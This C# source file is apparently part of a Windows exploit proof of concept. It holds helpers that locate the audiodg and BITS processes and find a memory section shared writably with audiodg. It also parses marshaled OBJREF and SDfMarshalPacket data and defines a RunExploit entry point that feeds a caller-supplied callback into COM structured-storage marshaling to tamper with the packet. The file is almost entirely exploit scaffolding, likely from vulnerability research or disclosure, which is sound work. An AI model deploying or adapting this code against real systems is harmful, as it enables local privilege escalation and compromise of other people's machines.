﻿using NtApiDotNet;
using System;
using System.IO;
using System.Linq;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading;

namespace StorageResearch
{
    /// <summary>
    /// Shared helpers for the storage research proof-of-concept: BinaryReader/BinaryWriter
    /// extensions, an OBJREF inspection routine, process discovery for audiodg/BITS,
    /// shared-section discovery and the <c>RunExploit</c> entry point.
    /// </summary>
    public static class ExploitCommon
    {
        /// <summary>
        /// Writes the 16-byte binary form of <paramref name="guid"/> as produced by
        /// <see cref="Guid.ToByteArray"/>.
        /// </summary>
        internal static void Write(this BinaryWriter writer, Guid guid)
        {
            writer.Write(guid.ToByteArray());
        }

        /// <summary>
        /// Writes <paramref name="str"/> as UTF-16LE (<see cref="Encoding.Unicode"/>) followed
        /// by a single NUL character. A null string writes only the terminator.
        /// </summary>
        internal static void WriteZString(this BinaryWriter writer, string str)
        {
            writer.Write(Encoding.Unicode.GetBytes(str + "\0"));
        }

        /// <summary>
        /// Reads exactly <paramref name="length"/> bytes.
        /// </summary>
        /// <exception cref="EndOfStreamException">Fewer than <paramref name="length"/> bytes remain.</exception>
        internal static byte[] ReadAll(this BinaryReader reader, int length)
        {
            byte[] ret = reader.ReadBytes(length);
            // BinaryReader.ReadBytes silently returns a short array at end of stream.
            if (ret.Length != length)
            {
                throw new EndOfStreamException();
            }
            return ret;
        }

        /// <summary>
        /// Reads a 16-byte GUID (inverse of <see cref="Write(BinaryWriter, Guid)"/>).
        /// </summary>
        /// <exception cref="EndOfStreamException">Fewer than 16 bytes remain.</exception>
        internal static Guid ReadGuid(this BinaryReader reader)
        {
            return new Guid(reader.ReadAll(16));
        }

        /// <summary>
        /// Reads a single 2-byte UTF-16 code unit in the machine's byte order
        /// (<see cref="BitConverter.ToChar(byte[], int)"/>).
        /// </summary>
        /// <exception cref="EndOfStreamException">Fewer than 2 bytes remain.</exception>
        internal static char ReadUnicodeChar(this BinaryReader reader)
        {
            return BitConverter.ToChar(reader.ReadAll(2), 0);
        }

        /// <summary>
        /// Reads UTF-16 code units up to and including a NUL terminator; the terminator is
        /// consumed but not included in the result.
        /// </summary>
        /// <exception cref="EndOfStreamException">The stream ends before a terminator is found.</exception>
        internal static string ReadZString(this BinaryReader reader)
        {
            StringBuilder builder = new StringBuilder();
            char ch = reader.ReadUnicodeChar();
            while (ch != 0)
            {
                builder.Append(ch);
                ch = reader.ReadUnicodeChar();
            }
            return builder.ToString();
        }

        /// <summary>
        /// Diagnostic helper. Loads a custom-marshaled OBJREF from disk and prints its
        /// marshal IID, flags and nested OBJREF. It then decodes the trailing
        /// <c>SDfMarshalPacket</c>, opens the section handle stored in it and prints the
        /// section size and the committed region size of a read/write mapping.
        /// </summary>
        /// <param name="args"><c>args[0]</c> is the path to the serialized OBJREF.</param>
        /// <exception cref="ArgumentException">
        /// No path was given, the OBJREF is not custom-marshaled, or the flags indicate an
        /// object this process cannot inspect.
        /// </exception>
        static void ReadObjRef(string[] args)
        {
            if (args.Length < 1)
            {
                throw new ArgumentException("Specify path to objref");
            }

            // A hard cast would surface a non-custom OBJREF as an InvalidCastException (or a
            // later NullReferenceException); report it as bad input instead.
            COMObjRefCustom objref = COMObjRef.FromArray(File.ReadAllBytes(args[0])) as COMObjRefCustom;
            if (objref == null)
            {
                throw new ArgumentException("Objref is not a custom marshaled object");
            }

            using (BinaryReader reader = new BinaryReader(new MemoryStream(objref.ObjectData)))
            {
                Guid marshal_iid = reader.ReadGuid();
                uint flags = reader.ReadUInt32();
                // NOTE(review): bit 31 presumably marks a 64-bit producer. The packet layout
                // below is read with this process's struct size, so only a 64-bit object
                // inside a 32-bit process is rejected here — confirm the reverse case.
                if ((flags & 0x80000000) != 0 && !Environment.Is64BitProcess)
                {
                    throw new ArgumentException("Can only inspect objects of the same bitness");
                }
                Console.WriteLine("IID: {0} Flags: {1:X08}", marshal_iid, flags);
                COMObjRef marshal_obj = COMObjRef.FromReader(reader);
                Console.WriteLine(marshal_obj);
                byte[] data = reader.ReadAll(Marshal.SizeOf<SDfMarshalPacket>());
                // Pin the raw bytes so they can be reinterpreted as the native struct.
                var handle = GCHandle.Alloc(data, GCHandleType.Pinned);
                try
                {
                    SDfMarshalPacket packet = Marshal.PtrToStructure<SDfMarshalPacket>(handle.AddrOfPinnedObject());
                    Console.WriteLine("{0:X}", packet.cntxid);
                    // ownsHandle == false: the handle value comes from the packet and is not
                    // closed when the wrapper is disposed.
                    using (NtSection section = NtSection.FromHandle(new SafeKernelObjectHandle(packet.hMem, false)))
                    {
                        Console.WriteLine("Section Size: {0}", section.Size);
                        using (NtMappedSection map = section.MapReadWrite())
                        {
                            Console.WriteLine("Committed: {0}", NtProcess.Current.QueryMemoryInformation(map.DangerousGetHandle().ToInt64()).RegionSize);
                        }
                    }
                }
                finally
                {
                    handle.Free();
                }
            }
        }

        /// <summary>
        /// Activates an <c>IAudioClient</c> on the default console render endpoint and
        /// initializes it in shared mode using the device's mix format.
        /// </summary>
        /// <returns>The initialized audio client; the caller keeps it alive.</returns>
        static IAudioClient StartAudioClient()
        {
            IMMDeviceEnumerator device_enum = (IMMDeviceEnumerator)new MMDeviceEnumerator();
            IMMDevice device = device_enum.GetDefaultAudioEndpoint(EDataFlow.eRender, ERole.eConsole);
            Guid iid = typeof(IAudioClient).GUID;
            // Assuming the interop mirrors IMMDevice::Activate, 6 is dwClsCtx =
            // CLSCTX_INPROC_HANDLER (0x2) | CLSCTX_LOCAL_SERVER (0x4).
            IAudioClient client = (IAudioClient)device.Activate(ref iid, 6, IntPtr.Zero);
            // GetMixFormat returns a CoTaskMemAlloc'd WAVEFORMATEX owned by the caller;
            // Initialize does not take ownership, so release it once Initialize returns.
            IntPtr pwfx = client.GetMixFormat();
            try
            {
                // Buffer duration is a REFERENCE_TIME in 100ns units: 10000000 == 1 second.
                client.Initialize(AUDCLNT_SHAREMODE.AUDCLNT_SHAREMODE_SHARED, 0, 10000000, 0, pwfx, IntPtr.Zero);
            }
            finally
            {
                Marshal.FreeCoTaskMem(pwfx);
            }
            return client;
        }

        /// <summary>
        /// Returns the PID of the first running process whose image name is
        /// <c>audiodg.exe</c> (case-insensitive).
        /// </summary>
        /// <exception cref="ArgumentException">No such process is running.</exception>
        static int GetAudioDGPid()
        {
            foreach (var proc in NtSystemInfo.GetProcessInformation())
            {
                if (proc.ImageName.Equals("audiodg.exe", StringComparison.OrdinalIgnoreCase))
                {
                    return proc.ProcessId;
                }
            }
            throw new ArgumentException("Can't find PID for AUDIODG");
        }

        /// <summary>
        /// Returns the process ID hosting the BITS service, after activating its COM class.
        /// The caller treats a return value of 0 as failure.
        /// </summary>
        static int GetBitsPid()
        {
            // {4991d34b-80a1-4291-83b6-3328366b9097} is CLSID_BackgroundCopyManager;
            // activating it presumably demand-starts the BITS service so it has a PID.
            object manager = Activator.CreateInstance(Type.GetTypeFromCLSID(new Guid("4991d34b-80a1-4291-83b6-3328366b9097")));
            int pid = NtApiDotNet.Win32.ServiceUtils.GetServiceProcessId("BITS");
            // Hold the COM reference until the PID has been read.
            GC.KeepAlive(manager);
            return pid;
        }

        /// <summary>
        /// Starts an audio client, then finds a Section object that both this process and
        /// audiodg hold a map-writable handle to. Returns it wrapped in a
        /// <c>SharedMemory</c> together with the audio client and the relevant PIDs.
        /// </summary>
        /// <exception cref="ArgumentException">
        /// audiodg or BITS cannot be located, or no suitable shared section is found.
        /// </exception>
        static SharedMemory GetSharedMemory()
        {
            IAudioClient client = StartAudioClient();
            Console.WriteLine("Waiting for handles to be updated");
            Thread.Sleep(1000);
            int audiodg_pid = GetAudioDGPid();
            int current_pid = NtProcess.Current.ProcessId;
            int bits_pid = GetBitsPid();
            if (bits_pid == 0)
                throw new ArgumentException("Couldn't get BITS pid");

            // Section handles in either process with SECTION_MAP_WRITE (0x2) granted, grouped
            // by kernel object; keep objects referenced by exactly two such handles.
            var shared_handles = NtSystemInfo.GetHandles(audiodg_pid, false)
                .Concat(NtSystemInfo.GetHandles(current_pid, false))
                .Where(h => h.ObjectType == "Section" && (h.GrantedAccess & 2) == 2)
                .GroupBy(h => h.Object).Where(g => g.Count() == 2).ToArray();

            foreach (var handle in shared_handles)
            {
                var entries = handle.ToArray();
                // Two handles in the same process are not a cross-process share.
                if (entries[0].ProcessId == entries[1].ProcessId)
                {
                    continue;
                }

                int local_handle;
                int remote_handle;

                if (entries[0].ProcessId == audiodg_pid)
                {
                    remote_handle = entries[0].Handle;
                    local_handle = entries[1].Handle;
                }
                else
                {
                    local_handle = entries[0].Handle;
                    remote_handle = entries[1].Handle;
                }

                Console.WriteLine("AudioDG 0x{0:X} PID 0x{1:X}", remote_handle, audiodg_pid);
                Console.WriteLine("Local 0x{0:X} PID 0x{1:X}", local_handle, current_pid);
                Console.WriteLine("BITS pid: {0}", bits_pid);
                return new SharedMemory(local_handle, audiodg_pid, remote_handle, client, bits_pid, current_pid);
            }
            throw new ArgumentException("Couldn't get shared handle");
        }

        /// <summary>
        /// Top-level entry point. Requires a 64-bit process. Creates the storage file
        /// <c>abc.stg</c>, wraps it with the discovered shared memory and
        /// <paramref name="callback"/> in a <c>TestClass</c>, and hands that to
        /// <c>ComUtils.BootstrapComMarshal</c>. Any exception is printed to the console
        /// rather than propagated.
        /// </summary>
        /// <param name="callback">
        /// Receives the marshal packet and shared memory and returns the packet to use;
        /// how it is invoked is determined by <c>TestClass</c>.
        /// </param>
        public static void RunExploit(Func<SDfMarshalPacket, SharedMemory, SDfMarshalPacket> callback)
        {
            try
            {
                if (!Environment.Is64BitProcess)
                {
                    throw new ArgumentException("Must run as a 64bit process");
                }

                IStorage stg = ComUtils.CreateStorage("abc.stg");
                TestClass c = new TestClass(stg, GetSharedMemory(), callback);
                ComUtils.BootstrapComMarshal(c);
            }
            catch (Exception ex)
            {
                // Deliberate top-level catch: report and return.
                Console.WriteLine(ex);
            }
        }
    }
}
